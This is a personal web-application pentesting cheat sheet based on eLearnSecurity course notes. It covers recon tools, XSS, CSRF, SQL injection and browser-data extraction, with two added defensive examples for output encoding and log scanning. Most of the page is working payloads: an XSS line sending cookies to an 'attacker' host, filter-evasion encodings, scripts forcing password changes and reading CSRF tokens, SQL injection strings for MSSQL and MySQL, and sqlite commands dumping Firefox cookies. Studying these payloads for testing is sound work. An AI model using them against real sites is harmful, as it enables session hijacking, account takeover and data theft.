|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed: 14.05.2017

Hacking web applications


As web application pentesting is a large topic on its own, I cover it on a separate page. This page collects some of the notes I took during the online courses eLearnSecurity Web Application Penetration Testing (eWAPT) and eLearnSecurity Web Application Penetration Testing eXtreme (eWAPTX).

information gathering


To identify possible attack vectors for a given target, you should start by determining the target scope and fingerprinting the underlying server technologies.

webserver fingerprinting

httprint (GUI tool)
http://toolbar.netcraft.com/site_report?url=target.com

cms scanning

wpscan -u wordpress.target.com
joomscan -u joomla.target.com

website mapping

burpsuite => spider
dirb http://target.com
dirbuster (GUI tool)

identify WAF

wafw00f http://target.com

vulnerability scanner

nikto -host http://target.com
w3af (GUI tool)

cross site scripting


Missing input sanitization can allow an attacker to inject JavaScript into a web page; the victim's browser then executes that code. A comprehensive resource for filter evasion tricks is the OWASP XSS Filter Evasion Cheat Sheet.

steal cookie

<svg/onload='var i=new Image;i.src="http://attacker/"+document.cookie;'>

submit form

<script>window.onload=function() 
{var f=document.getElementById("form"); var e=f.elements; 
e[0].value="newPassword";f.submit()};</script>

filter evasion

eval(String.fromCharCode(97,108,101,114,116)+"('xss')")
eval(/ale/.source+/rt/.source+/('xss')/.source)

base36 encoding

parseInt("alert",36)
eval(17795081..toString(36))(43804..toString(36))

base64 encoding

btoa("alert('xss')")  // produces the base64 string used in the next line
eval(atob(`YWxlcnQoJ3hzcycp`))
<object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K'>
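The counterpart to the payloads above is output encoding by context on the server side. This is an added example, not code from the original notes; the untrusted sample values are constructed from the payloads listed above, and the comment-rendering layout is an assumption.

```javascript
// Added example (not from the original notes): context-aware output encoding,
// the step whose absence the XSS payloads above rely on. Sample input is
// constructed from those payloads; the page layout is assumed.

// HTML element content and *quoted* attribute values: encode the characters
// that can open a tag, close a quote, or start an entity.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// URL attributes (href/src/data) need validation, not encoding: an encoded
// data: or javascript: URL still works. Drop control characters the way
// browsers do ("java\nscript:"), decode once, then allow only http(s).
function safeUrl(s) {
  let u = String(s).replace(/[\u0000-\u001f]/g, "").trim();
  try { u = decodeURIComponent(u); } catch (e) { return null; }
  return /^https?:\/\//i.test(u) ? u : null;
}

// Render one comment into a <p>. Every untrusted value goes through the
// encoder for its context; a rejected link is dropped, not "cleaned".
function renderComment({ author, text, link }) {
  const name = escapeHtml(author);
  const url = safeUrl(link);
  const who = url ? `<a href="${escapeHtml(url)}">${name}</a>` : name;
  return `<p>${who}: ${escapeHtml(text)}</p>`;
}

// Constructed untrusted input reusing the payloads listed above.
const SAMPLE = {
  author: "mallory",
  text: `<svg/onload='var i=new Image;i.src="http://attacker/"+document.cookie;'>`,
  link: "data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K",
};

// Limit of this approach: none of it helps once user data reaches a
// JavaScript sink. eval(atob(...)) above runs whatever the string decodes
// to, so the fix there is to keep untrusted input out of eval/Function.
```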

cross site request forgery


form post with csrf

<script>
var change_request = new XMLHttpRequest();
var url = "http://target/changePassword.php";
var params = "password=newPassword&submit=";

change_request.open("POST", url, true);
change_request.withCredentials = true;   // boolean, not the string 'true': include cookies in the cross-origin request
change_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
change_request.onreadystatechange = function(){
    if(change_request.readyState > 1){   // property name is case-sensitive; abort once the request is out, the response is not needed
        change_request.abort();
    }
}
change_request.send(params);
</script>

read csrf token via xss

<script>
var token_request = new XMLHttpRequest();
token_request.onreadystatechange = function (){
    if(token_request.readyState == 4){
        var htmlSource = token_request.responseText;
        var parser = new DOMParser().parseFromString(htmlSource, "text/html");
        var token = parser.getElementById("CSRFToken").value;
        changePass(token);   // not shown: hands the token to a form post like the one above
    }
}
token_request.open("GET", "http://target/editProfile.php", true);
token_request.withCredentials = true;   // boolean, not the string 'true'
token_request.send();
</script>

sql injection


Missing input validation can also lead to SQL injection vulnerabilities. As the exact design of an exploit depends on the query being injected into, I will only mention examples for some common techniques. A great page for further resources is OWASP.

error based sql injection (mssql)

p=999 or 1 in (select top 1 cast(name as varchar(4096))from database..sysobjects where xtype="U")--
p=999 or 1 in (select top 1 cast(database..syscolumns.name as varchar(4096))from database..syscolumns,database..sysobjects where database..syscolumns.id=database..sysobjects.id and database..sysobjects.name="tableXY")--
p=999 or 1 in (select top 1 cast(username as varchar(4096))%2bchar(64)%2bpassword from users where id=1)--

blind sql injection (mysql)

' OR 'a'='a
' OR 'a'='b
' OR ASCII(SUBSTRING(user(),1,1)) <=109 #
' OR SUBSTRING(user(),1,1) = 'a' #

time based sql injection (mssql)

if (select user) = 'sa' waitfor delay '0:0:5'

time based sql injection (mysql)

SELECT IF(EXISTS(SELECT * FROM users WHERE username = 'admin'), SLEEP(5), 0)
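On the detection side, the payload families listed above leave recognisable traces in web-server access logs. This added example (not from the original notes) decodes the query string of each log line the way the server would and flags the techniques shown here; the log lines are constructed for the example. It is a hunting aid, not a control: encoded or commented variants slip past it, and the actual fix is parameterised queries.

```javascript
// Added example (not from the original notes): triage of access logs for the
// injection patterns listed above. Log lines are constructed for the example.

// One indicator per payload family from the notes above.
const INDICATORS = [
  { name: "boolean tautology", re: /'\s*or\s*'[^']*'\s*=\s*'/i },
  { name: "char-by-char inference", re: /ascii\s*\(\s*substring\s*\(/i },
  { name: "mssql time delay", re: /waitfor\s+delay/i },
  { name: "mysql time delay", re: /\bsleep\s*\(\s*\d+\s*\)/i },
  { name: "mssql metadata", re: /\bsys(objects|columns)\b/i },
  { name: "comment terminator", re: /(--|#)\s*$/ },
];

// Decode like the server: '+' and %xx, applied twice so one layer of double
// encoding is also seen; then collapse whitespace.
function normalize(query) {
  let q = query.replace(/\+/g, " ");
  for (let i = 0; i < 2; i++) {
    try { q = decodeURIComponent(q); } catch (e) { break; }
  }
  return q.replace(/\s+/g, " ").trim();
}

// Combined log format: ip - - [ts] "METHOD /path?query HTTP/x" status size
const LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

function scanLog(text) {
  const hits = [];
  for (const line of text.split("\n")) {
    const m = LINE.exec(line);
    if (!m) continue;
    const [, ip, ts, method, target, status] = m;
    const qs = target.includes("?") ? target.slice(target.indexOf("?") + 1) : "";
    const q = normalize(qs);
    const reasons = INDICATORS.filter((i) => i.re.test(q)).map((i) => i.name);
    if (reasons.length) hits.push({ ip, ts, method, status: Number(status), query: q, reasons });
  }
  return hits;
}

// Constructed sample log: one benign request, then the payload shapes above.
const SAMPLE_LOG = [
  '10.0.0.5 - - [14/May/2017:10:00:01 +0200] "GET /news.php?p=3 HTTP/1.1" 200 512',
  '10.0.0.9 - - [14/May/2017:10:00:07 +0200] "GET /news.php?p=999%20or%201%20in%20(select%20top%201%20cast(name%20as%20varchar(4096))from%20database..sysobjects%20where%20xtype%3D%22U%22)-- HTTP/1.1" 500 210',
  '10.0.0.9 - - [14/May/2017:10:00:12 +0200] "GET /login.php?user=%27%20OR%20ASCII(SUBSTRING(user(),1,1))%20%3C%3D109%20%23 HTTP/1.1" 200 880',
  '10.0.0.9 - - [14/May/2017:10:00:20 +0200] "GET /item.php?id=1%3Bif%20(select%20user)%3D%27sa%27%20waitfor%20delay%20%270:0:5%27 HTTP/1.1" 200 880',
].join("\n");
```

A 5xx status together with a metadata-table indicator (second sample line) is the usual signature of the error-based technique; the time-based ones show up as normal 200s and are better correlated with response time.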

browser data


get bookmarks

sqlite3 .mozilla/firefox/<profile>.default/places.sqlite "select url from moz_places"

get cookies

sqlite3 .mozilla/firefox/<profile>.default/cookies.sqlite "select basedomain, name, value from moz_cookies"

list web storage

sqlite3 .mozilla/firefox/<profile>.default/webappsstore.sqlite "select originKey, key, value from webappsstore2"